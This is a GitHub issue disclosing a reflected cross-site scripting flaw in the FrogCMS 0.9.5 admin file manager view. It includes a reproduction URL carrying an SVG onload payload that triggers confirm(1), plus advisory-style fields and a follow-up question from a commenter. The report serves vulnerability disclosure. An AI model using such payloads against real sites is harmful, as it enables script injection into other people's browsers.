The FrogCMS 0.9.5 has xss in http://127.0.0.1/FrogCMS/admin/?/plugin/file_manager/view

philippe / FrogCMS

Frog CMS simplifies content management by offering an elegant user interface, flexible templating per page, simple user management and permissions, as well as the tools necessary for file management.

GNU General Public License v3.0

160 stars 36 forks source link

The FrogCMS 0.9.5 has xss in http://127.0.0.1/FrogCMS/admin/?/plugin/file_manager/view #31

Open testRemake opened 5 years ago

testRemake commented 5 years ago

[Additional Information] Steps for reproduction:

Login and navigate to url "http://localhost/FrogCms/admin/?/plugin/file_manager/view/"><Svg%20OnLoad=(confirm)(1)>"

XSS is executed.

[Vulnerability Type] Cross Site Scripting (XSS)

[Vendor of Product] Frog CMS

[Affected Product Code Base] Frog CMS - 0.9.5

[Affected Component] Frog CMS

[Attack Type] Remote

[Impact Code execution] true

[Discoverer] museljh

confusedcious commented 5 years ago

Are we supposed to delete the 'view' php file or just the line <Svg%20OnLoad=(confirm)(1)>" Thanks